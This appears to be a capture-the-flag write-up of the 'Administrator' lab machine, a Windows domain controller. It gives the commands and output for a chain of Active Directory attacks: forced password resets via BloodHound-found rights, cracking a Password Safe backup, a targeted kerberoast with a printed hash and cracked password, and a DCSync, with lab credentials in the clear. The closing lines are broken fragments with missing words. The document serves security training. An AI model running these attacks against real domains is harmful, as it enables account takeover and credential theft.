This is a Windows Server 2022 machine. Starting from provided credentials we are able to enumerate the domain with BloodHound CE and move laterally abusing GenericAll and ForceChangePassword edges. Eventually, we end up in an account that has access to an FTP server where we find a Password Safe backup that, once cracked, provides credentials that allow collecting the user flag.
Regarding escalation, the process is the same. We move laterally by enumerating with BloodHound CE and taking advantage of GenericWrite and GetChangesAll edges. We abuse them by means of a targeted kerberoasting and a DCSync attack respectively, and finally we are able to find administrator's hash.
KEYWORDS
BloodHound CE enumeration, GenericAll, ForceChangePassword, bloodyAD, net rpc, Password Safe, GenericWrite, targeted kerberoasting, GetChangesAll, DCSync attack.
REFERENCES
ENUMERATION
Port scan.
> for ports in $(nmap $target -p- --min-rate=5000 -Pn --open --reason | grep open | awk -F "/" '{print $1}' | tr '\n' ',' | sed s/,$//); do nmap $target -p$ports -sV -sC -Pn -vv -n && echo "\nList of open ports: $ports";done
Starting Nmap 7.93 ( https://nmap.org ) at 2025-01-25 19:01 GMT
Nmap scan report for 10.10.11.42
Host is up, received user-set (0.053s latency).
Scanned at 2025-01-25 19:01:22 GMT for 66s
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2025-01-26 02:06:35Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf syn-ack .NET Message Framing
49666/tcp open msrpc syn-ack Microsoft Windows RPC
49667/tcp open msrpc syn-ack Microsoft Windows RPC
63633/tcp open msrpc syn-ack Microsoft Windows RPC
63636/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
63645/tcp open msrpc syn-ack Microsoft Windows RPC
63652/tcp open msrpc syn-ack Microsoft Windows RPC
63655/tcp open msrpc syn-ack Microsoft Windows RPC
63668/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h05m07s
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 35406/tcp): CLEAN (Couldn't connect)
| Check 2 (port 20522/tcp): CLEAN (Couldn't connect)
| Check 3 (port 52572/udp): CLEAN (Timeout)
| Check 4 (port 52617/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
| date: 2025-01-26T02:07:27
|_ start_date: N/A
Nmap done: 1 IP address (1 host up) scanned in 66.53 seconds
List of open ports: 21,53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49666,49667,63633,63636,63645,63652,63655,63668
Looks like a domain controller. We have credentials for olivia:ichliebedich, update hosts file and enumerate SMB.
> smbmap -H administrator.htb -P 445 -u olivia -p ichliebedich
[+] IP: administrator.htb:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
Nothing useful here. Use credentials to dump additional domain usernames.
In BloodHound CE we inspect outbound edges from olivia@administrator.htb and notice she has GenericAll over michael@administrator.htb
USER
We will start by moving laterally to michael. Having GenericAll over him, there two ways to do it.
First option is with net user. Notice olivia is member of the Remote Management Users group, meaning we can have an Evil-WinRM session using her credentials.
Just open a shell and change michael password with net user
> evil-winrm -i administrator.htb -u olivia -p ichliebedich
> net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator alexander benjamin
emily emma ethan
Guest krbtgt michael
olivia
The command completed with one or more errors.
> net user michael password123
The command completed successfully.
A second option would be to use bloodyAD, as in Certified.
> python3 /home/kali/.local/bin/bloodyAD -d administrator.htb -u olivia -p ichliebedich --host 10.10.11.42 set password michael 'password123'
[+] Password changed successfully!
Whatever the chosen option, now we can mark michael as "Owned" in BloodHound CE, and continue enumerating from there.
As michael it seems we have ForceChangePassword over benjamin
Although we can open a WinRM shell as michael, in this case we cannot change benjamin password with net user since ForceChangePassword does not allow it.
However, we still can do it remotely with bloodyAD.
> python3 /home/kali/.local/bin/bloodyAD -d administrator.htb -u michael -p password123 --host 10.10.11.42 set password benjamin 'password123'
[+] Password changed successfully!
Or with net rpc
> net rpc password "benjamin" "password123" -U "administrator.htb"/"michael"%"password123" -S "administrator.htb"
Back in BloodHound CE, mark benjamin as "Owned" and start enumerating from there.
He is member of Share Moderators, which suggests he may have specific permissions on the SMB or FTP server.
Let's try enumerating SMB with benjamin credentials.
> smbmap -H administrator.htb -P 445 -u benjamin -p password123
[+] IP: administrator.htb:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
Nothing useful here. However, credentials work for the FTP server, and from there we can download the Backup.psafe3 file.
> ftp administrator.htb
Connected to administrator.htb.
220 Microsoft FTP Service
Name (administrator.htb:kali): benjamin
331 Password required
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
10-05-24 08:13AM 952 Backup.psafe3
226 Transfer complete.
ftp> get Backup.psafe3
local: Backup.psafe3 remote: Backup.psafe3
200 PORT command successful.
125 Data connection already open; Transfer starting.
WARNING! 3 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
952 bytes received in 0.04 secs (21.9634 kB/s)
ftp> exit
221 Goodbye.
> hashcat -m 5200 -a 0 Backup.psafe3 /usr/share/wordlists/rockyou.txt
With this password we can open the vault with Password Safe and dump another 3 credentials for usernames alexander@administrator.htb, emily@administrator.htb and emma@administrator.htb
And after a quick BloodHound CE enumeration of the three users, we see only emily@administrator.htb belongs to Remote Management Users
Just use her credentials to open a WinRM session.
An collect the user flag.
SYSTEM
Start from the emily shell and take the opportunity to enumerate the system.
> Get-ComputerInfo
WindowsBuildLabEx : 20348.1.amd64fre.fe_release.210507-1500
WindowsCurrentVersion : 6.3
WindowsEditionId : ServerStandard
WindowsInstallationType : Server
WindowsInstallDateFromRegistry : 10/4/2024 5:07:44 PM
WindowsProductId : 00454-20165-01481-AA452
WindowsProductName : Windows Server 2022 Standard
WindowsRegisteredOwner : Windows User
WindowsSystemRoot : C:\Windows
WindowsVersion : 2009
OSDisplayVersion : 21H2
Enumerate the emily account in BloodHound CE, she has GenericWrite over ethan
BloodHound suggests either a targeted kerberoast or a shadow credentials attack.
We can try a shadow credentials attack with Certipy, as we did in Week 1. EscapeTwo; however, it fails.
> sudo ntpdate 10.10.11.42 && certipy shadow auto -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb -dc-ip 10.10.11.42 -ns 10.10.11.42 -account ethan
[sudo] password for kali:
2025-01-26 21:44:05.372045 (+0000) +25230.779009 +/- 0.020212 10.10.11.42 s1 no-leap
CLOCK: time stepped by 25230.779009
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[-] Got error: socket ssl wrapping error: [Errno 104] Connection reset by peer
[-] Use -debug to print a stacktrace
In a nutshell, in this attack we set a Service Principal Name in a target account, for which we have GenericWrite, converting it into a service account. Then we request an ST for the new service account and crack it offline with module 13100.
> sudo rdate -n 10.10.11.42 && python3 /opt/kerberoast/targetedkerberoast.py -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb -d administrator.htb --dc-ip 10.10.11.42
Sun Jan 26 22:04:36 GMT 2025
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$Administrator.htb/ethan*$15ec7606ffa3297b86b280475f514f9c$2e4d87fb991fa421183d34d1f57dc6eff6cf90d47f165e99e8caa4042a91278d9ae1897d9b5bd1c4938ae952b02b253b63207405bb7f66b8509c614b4e8a0fe9bff6e4ae67a8c6df5ce80d08d1e2f0cc78389f94289f4fe121f402cf1d8a411db8e49116ae92534989d03f740899d01f2f264273ad4da38a5537fde4c4d629961839c4a7916a3f246240ce1e50602d648a17d05384131d1729c9debfe576e9a37bf347899896e9df8bec3b2ac16110da971e0142ef5435bb73ee2fca6baf923ad26540ff42b735d73ff730cdb075026d0646247db541b3c824a2c8fef6c72572d06c64f341778b0456cbf6376f22bc444228cc4fef86c8bb62093c7081daf6ab75c809508c2ca0ab0fe679e1dbbd753441316d58d1245fdcd9e1b8ef58faa2c71ae319296eeda923da7a42677e65a7ab048b694ea8f880bb021740f94eb4f9b1416d37cd75f41c2b9d045370890611857ae2576e117c1ca52de93918d7104e95c95cd130b2d06805d6c99d5c13b61ab0040f02117accc14a8ad06e2f6d66103c07e9e96a6a2a94f4a12e34e9c3f8b46a305e778a17958128465967076c0365d7c87bb6c517d8ab27d1a89f582a72e303bf0ac54c1c7d2fbe80b2500cab320cdbac803fdfa2c8a54e8db9870a5dd73193a85878752373da71d223e8cdd47dcd2ba3c3b353bc5f1af493da902c90b5a26a218aa6875ff9ffa5bc8bc2f1f90d65502819f01f3c8539950c1d905b2bd803145cfd603a6d75a654ce2c83210b59ed9e6c232841a7d6f5e706072e8e9ed38baaf4c04640841726e61a7f484e900ef1515480ba9b337f80c9cc9d0f974aff33b83897d340a925ab084d60914f708eb5cb917c91ecb362b490f2da965fc476956c7f2d9968ed61b10bdacd2c371955253ebbddfbfc97ee2b38badec0413bca0ec1e11aa44429c6d3d9ab73aaa4a1425fbf23123260c42ed28229e3b766ed0c5682eb6b097b315f72b8ce387978525b3800229f5a0980de2b1f947168c6956d06c8ad9178aefd34addba5e3c9f719619aa29301579cd426415ae8c9d832a93ce3beccf70b58340e949b12e9e6d9d7ef80a3b5852f0e372ba786237cb3f6b2a2738a3b70fd070f5ecd59e5cab52cb145113fc0f4832ba7adc297d6a01167773f9a9a3a5302a0c6a672b1437372d349752350778db5dcdb5f986a7b3110d2584d12a21d32960c061d0f5a60f182257b8954fcd13936b14ef1c6cd5396b2d3549971d83ef116fe4e65916c73f7d231e1c7c99bd82854b152c016f663ecc4c962a30dce3569f088398f8d230996901bfa72f3427ede4d73d1f7b8828fe098c958867c3bd9017002c3e74fbe73650d05228039b57c916ae017e89859afb79c9fb951c815476495819840ae9468fdb66d6ee687de54fed4724c77eee4bd4f9b4995005f644e2b1a58f87deb91088ec9e318fe9d1f6b34a33f6e2e001c2a0e3c0d7f463376a5e3827fadf2a88d6f79d73188b207e06b3207700a5929dd3b6d7fe47bb71402d1881a49a990f0472d912937b66825
Now crack the ST with module 13100.
> hashcat -m 13100 -a 0 -d 1 hash.txt .\rockyou.txt
OpenCL API (OpenCL 3.0 CUDA 11.4.264) - Platform #1 [NVIDIA Corporation]
========================================================================
* Device #1: NVIDIA GeForce GTX 980M, 8000/8192 MB (2048 MB allocatable), 12MCU
OpenCL API (OpenCL 1.2 ) - Platform #2 [Intel(R) Corporation]
=============================================================
* Device #2: Intel(R) HD Graphics 4000, skipped
* Device #3: Intel(R) Core(TM) i7-3740QM CPU @ 2.70GHz, skipped
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 105 MB
Dictionary cache hit:
* Filename..: .\rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$Administrator.htb/ethan*$15ec7606ffa3297b86b280475f514f9c$2e4d87fb991fa421183d34d1f57dc6eff6cf9
0d47f165e99e8caa4042a91278d9ae1897d9b5bd1c4938ae952b02b253b63207405bb7f66b8509c614b4e8a0fe9bff6e4ae67a8c6df5ce80d08d1e2f0cc78389f942
89f4fe121f402cf1d8a411db8e49116ae92534989d03f740899d01f2f264273ad4da38a5537fde4c4d629961839c4a7916a3f246240ce1e50602d648a17d05384131
d1729c9debfe576e9a37bf347899896e9df8bec3b2ac16110da971e0142ef5435bb73ee2fca6baf923ad26540ff42b735d73ff730cdb075026d0646247db541b3c82
4a2c8fef6c72572d06c64f341778b0456cbf6376f22bc444228cc4fef86c8bb62093c7081daf6ab75c809508c2ca0ab0fe679e1dbbd753441316d58d1245fdcd9e1b
8ef58faa2c71ae319296eeda923da7a42677e65a7ab048b694ea8f880bb021740f94eb4f9b1416d37cd75f41c2b9d045370890611857ae2576e117c1ca52de93918d
7104e95c95cd130b2d06805d6c99d5c13b61ab0040f02117accc14a8ad06e2f6d66103c07e9e96a6a2a94f4a12e34e9c3f8b46a305e778a17958128465967076c036
5d7c87bb6c517d8ab27d1a89f582a72e303bf0ac54c1c7d2fbe80b2500cab320cdbac803fdfa2c8a54e8db9870a5dd73193a85878752373da71d223e8cdd47dcd2ba
3c3b353bc5f1af493da902c90b5a26a218aa6875ff9ffa5bc8bc2f1f90d65502819f01f3c8539950c1d905b2bd803145cfd603a6d75a654ce2c83210b59ed9e6c232
841a7d6f5e706072e8e9ed38baaf4c04640841726e61a7f484e900ef1515480ba9b337f80c9cc9d0f974aff33b83897d340a925ab084d60914f708eb5cb917c91ecb
362b490f2da965fc476956c7f2d9968ed61b10bdacd2c371955253ebbddfbfc97ee2b38badec0413bca0ec1e11aa44429c6d3d9ab73aaa4a1425fbf23123260c42ed
28229e3b766ed0c5682eb6b097b315f72b8ce387978525b3800229f5a0980de2b1f947168c6956d06c8ad9178aefd34addba5e3c9f719619aa29301579cd426415ae
8c9d832a93ce3beccf70b58340e949b12e9e6d9d7ef80a3b5852f0e372ba786237cb3f6b2a2738a3b70fd070f5ecd59e5cab52cb145113fc0f4832ba7adc297d6a01
167773f9a9a3a5302a0c6a672b1437372d349752350778db5dcdb5f986a7b3110d2584d12a21d32960c061d0f5a60f182257b8954fcd13936b14ef1c6cd5396b2d35
49971d83ef116fe4e65916c73f7d231e1c7c99bd82854b152c016f663ecc4c962a30dce3569f088398f8d230996901bfa72f3427ede4d73d1f7b8828fe098c958867
c3bd9017002c3e74fbe73650d05228039b57c916ae017e89859afb79c9fb951c815476495819840ae9468fdb66d6ee687de54fed4724c77eee4bd4f9b4995005f644
e2b1a58f87deb91088ec9e318fe9d1f6b34a33f6e2e001c2a0e3c0d7f463376a5e3827fadf2a88d6f79d73188b207e06b3207700a5929dd3b6d7fe47bb71402d1881
a49a990f0472d912937b66825:limpbizkit
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*ethan$ADMINISTRATOR.HTB$Administrator....b66825
Time.Started.....: Sun Jan 26 16:08:51 2025 (1 sec)
Time.Estimated...: Sun Jan 26 16:08:52 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (.\rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 16938.7 kH/s (7.64ms) @ Accel:512 Loops:1 Thr:32 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 196608/14344384 (1.37%)
Rejected.........: 0/196608 (0.00%)
Restore.Point....: 0/14344384 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> piggy!
Hardware.Mon.#1..: Temp: 41c Util: 5% Core:1037MHz Mem:2505MHz Bus:16
Started: Sun Jan 26 16:08:49 2025
Stopped: Sun Jan 26 16:08:52 2025
Back again in BloodHound CE, we see ethan has GetChangesAll over administrator
The only thing that's left is to use administrator's hash to open a shell.
You are root.
This file is associated to the and can be cracked with module 5200.
So let's try a .
We will use the suggested by BloodHound CE. It automatically logs in using provided credentials and enumerate usernames over which the SPN can be overwritten, then an ST is requested. Finally, SPN is cleared so it is left in its original state.
Which essentially allows a with Impacket's secretsdump.py
